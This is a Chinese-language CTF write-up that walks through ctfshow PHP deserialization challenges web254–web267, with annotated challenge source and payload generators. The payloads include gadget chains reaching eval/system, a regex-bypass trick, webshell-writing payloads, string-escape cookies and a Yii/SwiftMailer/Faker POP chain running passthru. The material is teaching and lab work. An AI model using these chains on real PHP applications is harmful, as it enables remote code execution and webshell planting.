目錄
web254
web255
web256
web257
web258
web259
web260
web261
web262
web263
web264
web265
web266
web267
web254
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-02 17:44:47
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
?
*/
?
// Silence every diagnostic: a missing $_GET key or a failed unserialize() produces no visible notice.
error_reporting(0);
// The challenge is white-box: the source of this file is printed to the visitor.
highlight_file(__FILE__);
// flag.php is not shown; the class below reads `global $flag`, so it presumably defines that variable.
include('flag.php');
?
/**
 * web254 user: VIP status is flipped by a successful login().
 * Credentials are compared with === against the hard-coded defaults.
 */
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    /** Current VIP state. */
    public function checkVip(){
        return $this->isVip;
    }

    /**
     * Strict comparison of $u/$p with the stored credentials; on a match the
     * object becomes VIP. Returns the (possibly updated) VIP state.
     */
    public function login($u,$p){
        $matched = ($u === $this->username) && ($p === $this->password);
        if ($matched) {
            $this->isVip = true;
        }
        return $this->isVip;
    }

    /** Print the global $flag for VIPs, otherwise a refusal message. */
    public function vipOneKeyGetFlag(){
        if (!$this->isVip) {
            echo "no vip, no flag";
            return;
        }
        global $flag;
        echo "your flag is ".$flag;
    }
}
?
// Credentials arrive unauthenticated on the query string; a missing key yields null (notices suppressed).
$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    // Fresh object with the default 'xxxxxx'/'xxxxxx' credentials: supplying those two values is enough.
    $user = new ctfShowUser();
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}
直接審一下代碼可以知道
username=xxxxxx&password=xxxxxx
就可以flag
web255
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-02 17:44:47
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
?
*/
?
// Silence every diagnostic, including unserialize() failures on a malformed cookie.
error_reporting(0);
// White-box: the source is printed to the visitor.
highlight_file(__FILE__);
// Not shown; presumably defines the global $flag read by vipOneKeyGetFlag().
include('flag.php');
?
/**
 * web255 user: VIP status is a plain public property, so it is whatever the
 * object was deserialized with. login() no longer modifies it.
 */
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    /** Report the stored VIP flag unchanged. */
    public function checkVip(){
        return $this->isVip;
    }

    /** Strict comparison of both credentials; no side effects. */
    public function login($u,$p){
        $userOk = ($u === $this->username);
        $passOk = ($p === $this->password);
        return $userOk && $passOk;
    }

    /** Echo the global $flag when VIP, otherwise a refusal. */
    public function vipOneKeyGetFlag(){
        if (!$this->isVip) {
            echo "no vip, no flag";
            return;
        }
        global $flag;
        echo "your flag is ".$flag;
    }
}
?
// Credentials come from the query string; a missing key is null (notices are suppressed above).
$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    // SECURITY: the object is rebuilt from an attacker-supplied cookie. unserialize() does not call
    // __construct(), but class property defaults still apply, so a cookie only needs to carry isVip.
    $user = unserialize($_COOKIE['user']);
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}
首先,GET傳入的username和password都是xxxxxx(與類別中的預設值一致)
原始碼里面有
$user = unserialize($_COOKIE['user'])
$user->login($username,$password)
然后就是說,我們需要讓反序列化后的結果是ctfShowUser的實體化物件。unserialize()不會呼叫__construct(),但類別屬性的預設值仍然生效,所以username/password保持xxxxxx;又因為只有$this->isVip為true才能拿到flag,所以反序列化的內容只需設定isVip(序列化結果放進cookie時記得URL編碼,否則裡面的分號會截斷cookie值):
<?php
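/**
 * web255 cookie: only isVip needs to be present — unserialize() keeps the
 * class defaults for username/password, which the GET parameters must match.
 */
class ctfShowUser{
    public $isVip=true;
}
// Emit the cookie-safe (percent-encoded) form: the raw string contains '"', ';' and '{}',
// and an unencoded ';' would terminate the cookie value in the Cookie header.
echo urlencode(serialize(new ctfShowUser));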
web256
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-02 17:44:47
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
?
*/
?
// Silence every diagnostic, including unserialize() failures on a malformed cookie.
error_reporting(0);
// White-box: the source is printed to the visitor.
highlight_file(__FILE__);
// Not shown; presumably defines the global $flag read by vipOneKeyGetFlag().
include('flag.php');
?
/**
 * web256 user: like web255, but the flag is additionally withheld when the
 * stored username and password are identical.
 */
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    /** Report the stored VIP flag unchanged. */
    public function checkVip(){
        return $this->isVip;
    }

    /** Strict comparison of both credentials; no side effects. */
    public function login($u,$p){
        $userOk = ($u === $this->username);
        $passOk = ($p === $this->password);
        return $userOk && $passOk;
    }

    /**
     * Echo the global $flag for a VIP whose username differs from password;
     * a VIP with identical credentials gets no output at all.
     */
    public function vipOneKeyGetFlag(){
        if (!$this->isVip) {
            echo "no vip, no flag";
            return;
        }
        global $flag;
        if ($this->username !== $this->password) {
            echo "your flag is ".$flag;
        }
    }
}
?
// Credentials come from the query string; a missing key is null (notices are suppressed above).
$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    // SECURITY: attacker-controlled unserialize(). login() compares against whatever username/password
    // the cookie carries, so the GET parameters must match the crafted values, not the defaults.
    $user = unserialize($_COOKIE['user']);
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}
構造陳述句與上題相似,但是這里
if($this->username!==$this->password){
echo "your flag is ".$flag;
}
是要求username不等于password。注意GET傳入的username/password必須與物件中序列化的值一致(這裡就是username=xxxxxx&password=6),然后直接寫代碼就好了
<?php
/** web256 cookie: VIP on, with a password chosen to differ from the username. */
class ctfShowUser{
    public $username='xxxxxx';
    public $password='6'; // must differ from username; the GET parameters have to match both values
    public $isVip=true;
}
$payload = serialize(new ctfShowUser());
// Cookie-safe form: quotes, semicolons and braces are percent-encoded.
echo urlencode($payload);
?>
以上php腳本,得到我們需要的序列化字串,注意要進行URL編碼!
?
輸出:O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A1%3A%226%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D
web257
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-02 17:44:47
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-02 20:33:07
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
?
*/
?
// Silence every diagnostic (a failed unserialize() or a method call on a non-object stays invisible).
error_reporting(0);
// White-box: the source is printed to the visitor.
highlight_file(__FILE__);
?
/**
 * web257 user. All properties are private, so they serialize with "\0ctfShowUser\0name"
 * keys; a crafted cookie must be URL-encoded to carry the NUL bytes.
 */
class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';

    // Not executed by unserialize(); only a direct `new` installs an info instance here.
    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    // SECURITY: sink. Runs when the object is freed (end of request). If the cookie set $class
    // to a backDoor instance, this call reaches eval() in backDoor::getInfo().
    public function __destruct(){
        $this->class->getInfo();
    }

}
?
/** Benign getInfo() target: simply hands back the stored user name. */
class info{
    private $user='xxxxxx';
    public function getInfo(){
        $name = $this->user;
        return $name;
    }
}
?
/**
 * Gadget class: getInfo() evals its private $code property.
 * SECURITY: eval() on data that can arrive through unserialize() of a cookie is
 * arbitrary code execution; this is the intended sink of the challenge.
 */
class backDoor{
    private $code;
    public function getInfo(){
        $src = $this->code;
        eval($src);
    }
}
?
// Both parameters only need to be present; their values are never checked meaningfully.
$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    // SECURITY: attacker-controlled unserialize(). login()'s result is discarded; what matters is
    // that $user's __destruct() runs at the end of the request and calls $this->class->getInfo()
    // on whatever object the cookie embedded.
    $user = unserialize($_COOKIE['user']);
    $user->login($username,$password);
}
很明顯的我們一眼就看到了eval那個函式(backDoor::getInfo),所以肯定要利用那個函式
再往上看,ctfShowUser的__destruct()會呼叫$this->class->getInfo(),而__construct()在unserialize時並不會執行;因此只要把class屬性換成backDoor物件,請求結束時析構函式就會觸發eval。屬性都是private,序列化結果含\0字元,必須URL編碼
構造代碼
<?php
/**
 * web257 cookie: a ctfShowUser whose private $class is a backDoor carrying the
 * PHP to eval(). Private properties serialize as "\0Class\0name", hence the
 * urlencode() so the NUL bytes survive the Cookie header.
 */
class ctfShowUser{
    private $class;
    public function __construct(){
        $this->class=new backDoor();
    }
}
class backDoor{
    private $code='system("cat f*");';
}
$cookie = serialize(new ctfShowUser());
echo urlencode($cookie);
web258
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-02 17:44:47
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-02 21:38:56
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
?
*/
?
// Silence every diagnostic (a rejected cookie leaves $user undefined; the later call fails silently).
error_reporting(0);
// White-box: the source is printed to the visitor.
highlight_file(__FILE__);
?
/**
 * web258 user: same gadget shape as web257, but with public properties, so the
 * serialized form has plain "username"/"class" keys (no NUL bytes).
 */
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
    public $class = 'info';

    // Not executed by unserialize(); only a direct `new` installs an info instance here.
    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    // SECURITY: sink. Runs when the object is freed; with $class set to a backDoor via the
    // cookie, this reaches eval() in backDoor::getInfo().
    public function __destruct(){
        $this->class->getInfo();
    }

}
?
/** Benign getInfo() target: simply hands back the stored user name. */
class info{
    public $user='xxxxxx';
    public function getInfo(){
        $name = $this->user;
        return $name;
    }
}
?
/**
 * Gadget class: getInfo() evals its public $code property.
 * SECURITY: eval() on data that can arrive through unserialize() of a cookie is
 * arbitrary code execution; this is the intended sink of the challenge.
 */
class backDoor{
    public $code;
    public function getInfo(){
        $src = $this->code;
        eval($src);
    }
}
?
// Both parameters only need to be present.
$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    // Deny-list: rejects "O:<digits>:" / "C:<digits>:" case-insensitively. It does not reject a
    // sign in front of the length (e.g. "O:+11:"), which the writeup's payload relies on
    // unserialize() still accepting on the target's PHP version.
    if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
        $user = unserialize($_COOKIE['user']);
    }
    // When the filter matched, $user is undefined here and this call errors (silently).
    $user->login($username,$password);
}
在上一個題的基礎上加了個正則/[oc]:\d+:/i,只需要在O后面的長度前加一個加號(O:+11:),\d+就匹配不到,而unserialize仍然接受帶正號的長度;另外這題屬性改為public,payload也要對應改
構造代碼
<?php
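/*
 * Payload generator for web258. The gadget classes are declared with DATA ONLY:
 * the original copy also carried __destruct()/getInfo(), which meant that
 * reassigning $a below freed the object and ran eval("system('cat flag.php');")
 * on the attacker's own machine, polluting the printed payload. serialize()
 * needs only property names and values, so the methods are unnecessary.
 */
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=true;
    public $class = 'backDoor';

    public function __construct(){
        $this->class=new backDoor();
    }
}

class backDoor{
    public $code="system('cat flag.php');";
}

$a = new ctfShowUser();
$a = serialize($a);
// The server rejects /[oc]:\d+:/i. A '+' in front of the length breaks the \d+ match while
// unserialize() still parses it; both objects (ctfShowUser and the nested backDoor) get it.
$a = str_replace('O:', 'O:+', $a);
// URL-encode so quotes, semicolons and braces survive the Cookie header.
echo urlencode($a);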
然后添加cookie,再添加上username和password,得到flag
web259
暫時不大會~~
web260
題目的意思就是序列化出來的東西包含字串ctfshow_i_love_36D,就可以了,所以我們可以直接傳ctfshow=ctfshow_i_love_36D
web261
<?php
?
// White-box: the source is printed to the visitor.
highlight_file(__FILE__);
?
/**
 * web261 target. Relevant semantics visible in this file:
 *  - __unserialize() is defined, so it (not __wakeup()) runs on unserialize();
 *    the empty-credential check in __wakeup() is therefore never applied.
 *  - __destruct() compares $code with 0x36d (877) using loose ==, then writes
 *    $password into the file named by $username.
 */
class ctfshowvip{
    public $username;
    public $password;
    public $code;

    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    // Dead on unserialize(): __unserialize() takes precedence (PHP >= 7.4).
    public function __wakeup(){
        if($this->username!='' || $this->password!=''){
            die('error');
        }
    }
    // Only reached if the object is called like a function; nothing in this file does that.
    public function __invoke(){
        eval($this->code);
    }

    // Blanks the credentials on serialize() and returns nothing (serialize() expects an array
    // of property names) — irrelevant to an attacker who builds the string by hand.
    public function __sleep(){
        $this->username='';
        $this->password='';
    }
    // Rebuilds the object from the serialized property array; $code becomes username.password.
    public function __unserialize($data){
        $this->username=$data['username'];
        $this->password=$data['password'];
        $this->code = $this->username.$this->password;
    }
    // SECURITY: arbitrary file write. Loose ==: on PHP 7.x a leading-numeric string such as
    // "877.php<?php ..." equals 877 (PHP 8 compares int vs non-numeric string as strings, so it fails there).
    public function __destruct(){
        if($this->code==0x36d){
            file_put_contents($this->username, $this->password);
        }
    }
}
?
// SECURITY: attacker-controlled unserialize(). The result is discarded, but __unserialize() runs
// immediately and __destruct() fires as soon as the temporary object is released.
unserialize($_GET['vip']);
注:
如果類中同時定義了__unserialize()和__wakeup()兩個魔術方法(PHP 7.4+),則只有__unserialize()方法會生效,__wakeup()方法會被忽略,所以裡面的非空檢查根本不會執行
首先看__destruct這一塊:code若弱類型等于0x36d(877)就會執行file_put_contents,而code是username和password拼接出來的(即"877.php<?php ..."),所以只要username=877.php、password=shell內容就可以了
"877.php..."==877在PHP 7下成立(非數值字串與整數比較時取前導數字877);PHP 8改為字串比較,這個弱比較在PHP 8上不成立
public function __destruct(){
if($this->code==0x36d){
file_put_contents($this->username, $this->password);
}
}
最后的payload
<?php
/**
 * web261 payload. username is the file name, password its content; the target's
 * __unserialize() concatenates them into $code and __destruct()'s loose
 * `$code == 0x36d` holds because the string starts with "877" (PHP 7 numeric-prefix
 * comparison). Note that eval() in the written file receives system()'s return value;
 * the command still runs and its output is printed.
 */
class ctfshowvip{
    public $username;
    public $password;
    public function __construct($u='',$p=''){
        // Arguments are deliberately ignored; the values are fixed.
        $this->username="877.php";
        $this->password="<?php eval(system('tac /fl*')); ?>";
    }
}
$vip = new ctfshowvip();
echo urlencode(serialize($vip));
web262
原始碼(index.php,產生cookie的一側)以及message.php的相關片段
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-03 02:37:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-03 16:05:38
# @message.php
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
?
*/
?
?
// Silence every diagnostic (a missing $_GET key produces no visible notice).
error_reporting(0);
/** Plain message DTO; token defaults to 'user' and is never set by the constructor. */
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        [$this->from, $this->msg, $this->to] = [$f, $m, $t];
    }
}
?
// All three fields come straight from the query string.
$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    // SECURITY: the replacement runs AFTER serialize(), so every 'fuck' -> 'loveU' grows a string
    // by one byte while its s:N: length prefix stays N. Enough replacements in one field push
    // attacker-supplied bytes past the declared boundary (serialization string escape).
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    setcookie('msg',base64_encode($umsg));
    echo 'Your message has been sent';
}
?
highlight_file(__FILE__);
message.php(這里貼的片段與上面index.php的過濾部分相同;真正讀取cookie並反序列化的message.php代碼未貼出)
// Same filter-after-serialize block as in the index.php listing above: the length prefix is
// computed before the replacement, which is what makes the escape possible.
if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    setcookie('msg',base64_encode($umsg));
    echo 'Your message has been sent';
}
這個題考察的是反序列化字串逃逸。message.php(代碼未貼出)應該是把cookie msg base64解碼后unserialize,並要求token為admin才能輸出flag
先隨便輸出一個看看序列化結果,構造代碼
<?php
/** Local copy of the target's message class, used only to produce reference output. */
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        [$this->from, $this->msg, $this->to] = [$f, $m, $t];
    }
}

/** Mirror of the server-side replacement ('fuck' -> 'loveU', one byte longer). */
function filter($msg){
    $clean = str_replace('fuck', 'loveU', $msg);
    return $clean;
}

$sample = new message('a','b','c');

$raw = serialize($sample);

echo $raw;

//O:7:"message":4:{s:4:"from";s:1:"a";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:4:"user";}
然后加上過濾后的結果
<?php
/** Local copy of the target's message class, used only to observe the filtered output. */
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        [$this->from, $this->msg, $this->to] = [$f, $m, $t];
    }
}

/** Mirror of the server-side replacement ('fuck' -> 'loveU', one byte longer). */
function filter($msg){
    $clean = str_replace('fuck', 'loveU', $msg);
    return $clean;
}

$sample = new message('a','b','c');

// Note the length prefix (s:4:) is computed before the replacement and is not updated.
$filtered = filter(serialize($sample));

echo $filtered;

//O:7:"message":4:{s:4:"from";s:4:"loveU";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:4:"user";}
在這里很明顯可以看出:序列化時記錄的長度4對應的是原本的fuck,過濾后變成5個字元的loveU,而長度前綴不變,所以每一個fuck可以逃逸出一個字元。下面要塞進去的尾巴總共62個字元,因此需要62個fuck。先寫出payload
//O:7:"message":4:{s:4:"from";s:4:"loveU";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";}
";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";}
添加上payload的代碼如下(62個fuck後面接上述尾巴)
<?php
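/** Local copy of the target's message class. */
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

/** Mirror of the server-side replacement ('fuck' -> 'loveU', one byte longer). */
function filter($msg){
    return str_replace('fuck', 'loveU', $msg);
}

// Bytes that must end up outside the declared length of "from": they close the from string
// and supply the remaining properties with token=admin, then close the object.
$tail = '";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";}';
// Each 'fuck' (4 bytes) becomes 'loveU' (5 bytes) while the s:N: prefix stays N, so one
// replacement escapes one byte; the count is derived from the tail instead of hand-typed.
$from = str_repeat('fuck', strlen($tail)) . $tail;

$msg = new message($from,'b','c');

$msg_1 = serialize($msg);

//echo $msg_1;


$msg_2 =filter($msg_1);

echo $msg_2;

//O:7:"message":4:{s:4:"from";s:310:"loveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveU";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";}";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:4:"user";}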
然后把這個字串base64編碼后放到cookie msg中,再訪問message.php就可以了
web263
php引擎的session存盤格式是 鍵名|serialized_string,而php_serialize引擎的存盤格式是整個$_SESSION陣列serialize后的字串;兩者不一致時,資料里的|會被當成鍵名/值的分隔符,後面的內容就會被反序列化
一開始是一個原始碼泄露,訪問URL+www.zip得到原始碼
查看inc.php,其中ini_set('session.serialize_handler','php');表明了是使用php引擎
全域搜索session,第一次訪問就會產生session;之后只要limit沒有超過5的話:
if(isset($_SESSION['limit'])){
    // NOTE: the key checked here is 'limti', not 'limit' — it is never set, so the comparison is
    // null > 5 and never dies. The base64-decoded cookie is then written verbatim into
    // $_SESSION['limit'] (the injection point for the handler-mismatch attack).
    $_SESSION['limti']>5?die("登陸失敗次數超過限制"):$_SESSION['limit']=base64_decode($_COOKIE['limit']);
    // Overwrites the local $_COOKIE copy only; no Set-Cookie is sent here.
    $_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit']) +1);
}else{
    setcookie("limit",base64_encode('1'));
    $_SESSION['limit']= 1;
}
cookie limit可控,base64解碼后會直接寫進$_SESSION['limit'],所以可以用它來構造payload(這里假設網站的User類在析構時會把password寫進username指定的檔案,對應的原始碼未貼出)
<?php
/**
 * web263 payload. The target's User class (not shown here) is assumed to turn
 * username/password into a file write; only the property names and values matter.
 */
class User{
    public $username;
    public $password;
    public $status='a';

}
$user = new User();
$user->username = 'b.php';
$user->password = '<?php system("cat f*");?>';
// Leading '|': with session.serialize_handler=php the stored record is "key|value", so the
// bytes after the bar are what the php handler deserializes when the session is read back.
echo base64_encode('|'.serialize($user));
首先訪問原頁面拿到session,把cookie limit改成上面的值,然后訪問index.php讓payload寫進session檔案,再訪問check.php觸發反序列化寫出木馬,最終訪問生成的檔案(即payload中username指定的檔名)
web264
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-03 02:37:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-03 16:05:38
# @message.php
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
?
*/
?
?
// Silence every diagnostic.
error_reporting(0);
// The filtered message is kept server-side in the session (see below) rather than in a cookie.
session_start();
?
/** Plain message DTO; token defaults to 'user' and is never set by the constructor. */
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        [$this->from, $this->msg, $this->to] = [$f, $m, $t];
    }
}
?
// All three fields come straight from the query string.
$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    // SECURITY: same filter-after-serialize bug as web262 — the s:N: prefix is not updated when
    // 'fuck' grows into 'loveU', so attacker bytes can escape the field. The only difference is
    // that the result lives in $_SESSION, so the consumer must be hit with the same session cookie.
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    $_SESSION['msg']=base64_encode($umsg);
    echo 'Your message has been sent';
}
?
highlight_file(__FILE__);
與262一樣,不同地方在于message.php里是
$msg = unserialize(base64_decode($_SESSION['msg']));
用的是session,而不是cookie
在index.php頁面傳(尾巴";s:5:"token";s:5:"admin";}長27個字元,所以需要27個fuck):
?f=1&m=1&t=1fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}
然后帶著同一個PHPSESSID cookie訪問message.php即可(不需要另外構造cookie,只要session一致)
web265
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-04 23:52:24
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
?
*/
?
// Silence every diagnostic, including a failed unserialize() of the query parameter.
error_reporting(0);
// Not shown; presumably defines the global $flag echoed below.
include('flag.php');
// White-box: the source is printed to the visitor.
highlight_file(__FILE__);
/** web265 target: login() succeeds only when token and password are identical. */
class ctfshowAdmin{
    public $token;
    public $password;

    public function __construct($t,$p){
        $this->token=$t;
        $this->password = $p;
    }
    /** Strict equality of the two properties. */
    public function login(){
        $same = ($this->password === $this->token);
        return $same;
    }
}
?
// SECURITY: attacker-controlled unserialize() from the query string.
$ctfshow = unserialize($_GET['ctfshow']);
// token is replaced with an unpredictable value after deserialization, so the attacker cannot
// simply supply matching strings. However, if the payload made $password a PHP reference to
// $token (an "R:n;" entry, which unserialize() restores), this assignment updates both.
$ctfshow->token=md5(mt_rand());

if($ctfshow->login()){
    echo $flag;
}
利用參考(引用)使類的屬性的值永遠相等:把password設為token的參考,序列化后password會變成R:2;,unserialize后伺服器再覆蓋token時password也會同步改變,===自然成立
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-04 23:52:24
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
?
*/
?
/**
 * web265 payload: password is made a PHP reference to token, so the serialized
 * object carries "R:2;" and whatever the server later assigns to token is seen
 * through password as well, making the === in login() hold.
 */
class ctfshowAdmin{
    public $token;
    public $password;

    public function __construct($t,$p){
        $this->token=$t;
        // $p is deliberately unused: password must alias token, not copy it.
        $this->password = &$this->token;
    }
    public function login(){
        return $this->token===$this->password;
    }
}
$gadget = new ctfshowAdmin('123','123');

echo serialize($gadget);
web266
<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-04 23:52:24
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
?
*/
?
// White-box: the source is printed to the visitor.
highlight_file(__FILE__);
?
// Not shown; presumably defines the global $flag echoed by ctfshow::__destruct().
include('flag.php');
// Raw request body, unfiltered; it is deserialized before any check is applied.
$cs = file_get_contents('php://input');
?
?
/**
 * web266 target. The destructor unconditionally echoes the global $flag, so
 * merely getting an instance created (e.g. via unserialize()) leaks it.
 */
class ctfshow{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public function __construct($u,$p){
        [$this->username, $this->password] = [$u, $p];
    }
    /** True iff both credentials are identical. */
    public function login(){
        return $this->password === $this->username;
    }
    /** String form is the user name (used when the object is interpolated into a message). */
    public function __toString(){
        return $this->username;
    }
    public function __destruct(){
        global $flag;
        echo $flag;
    }
}
// SECURITY: unserialize() runs BEFORE the keyword filter, so an instance already exists (and its
// __destruct() will echo $flag) even when the exception below is thrown. The regex is
// case-sensitive, while PHP class names are resolved case-insensitively.
$ctfshowo=@unserialize($cs);
if(preg_match('/ctfshow/', $cs)){
    // Interpolating the object calls __toString() on a ctfshow instance.
    throw new Exception("Error $ctfshowo",1);
}
這里只要$cs里出現了ctfshow就會拋出例外錯誤。但unserialize在preg_match之前就已經執行,而物件的__destruct()無條件輸出flag;正則區分大小寫,PHP的類名卻不區分大小寫,所以只要把類名改個大小寫就能繞過
<?php
// Class name differs only in case: PHP resolves class names case-insensitively, while the
// server's preg_match('/ctfshow/') is case-sensitive, so "Ctfshow" is deserialized but not caught.
class Ctfshow{};
$obj = new Ctfshow();
echo serialize($obj);
?>
?
//O:7:"Ctfshow":0:{}

web267
打開頁面,先是弱口令登錄
admin//賬號
admin//密碼
然后F12查看源代碼,找到了
?view-source
但因為URL本身已經帶有參數,拼接時不是?號而是&號(即&view-source)
在這里是一個yii框架的反序列化鏈,大致為Swift_KeyCache_DiskKeyCache::__destruct → See::__toString → Faker\Generator::__call → yii\rest\CreateAction::run(按下面的payload推斷,具體以目標版本為準)
這個題用system沒有回顯,然后看到別人用passthru有回顯
<?php
namespace yii\rest{
    /**
     * Chain terminus. Presumably CreateAction::run() invokes the $checkAccess callable with $id
     * (so passthru('cat /flag')) — verify against the target's Yii version.
     */
    class CreateAction{
        public $checkAccess;
        public $id;

        public function __construct(){
            // passthru is used because, per the writeup, system() gave no visible output on the target.
            $this->checkAccess = 'passthru';
            $this->id = 'cat /flag';
        }
    }
}
?
namespace Faker{
    use yii\rest\CreateAction;

    /** Presumably Generator::__call() looks up $formatters[$method] and calls it — verify. */
    class Generator{
        protected $formatters;

        public function __construct(){
            // Original author's note: this key may need to be 'isRunning' instead of 'render',
            // depending on which method the preceding gadget calls on the generator — confirm
            // against the target's phpDocumentor/Faker versions.
            $this->formatters['render'] = [new CreateAction(), 'run'];
        }
    }
}
?
namespace phpDocumentor\Reflection\DocBlock\Tags{

    use Faker\Generator;

    /**
     * Presumably See::__toString() calls a method (render) on $description; the Generator
     * stands in for the real Description object and absorbs that call via __call() — verify.
     */
    class See{
        protected $description;
        public function __construct()
        {
            $this->description = new Generator();
        }
    }
}
namespace{
    use phpDocumentor\Reflection\DocBlock\Tags\See;
    /**
     * Entry gadget. Presumably Swift_KeyCache_DiskKeyCache::__destruct() iterates $keys and uses
     * $path in a string context, which triggers See::__toString() — verify against the bundled
     * SwiftMailer version.
     */
    class Swift_KeyCache_DiskKeyCache{
        private $keys = [];
        private $path;
        public function __construct()
        {
            $this->path = new See;
            // Any non-empty array: the destructor only needs something to iterate over.
            $this->keys = array(
                "axin"=>array("is"=>"handsome")
            );
        }
    }
    // Emit the chain base64-encoded.
    echo base64_encode(serialize(new Swift_KeyCache_DiskKeyCache()));
}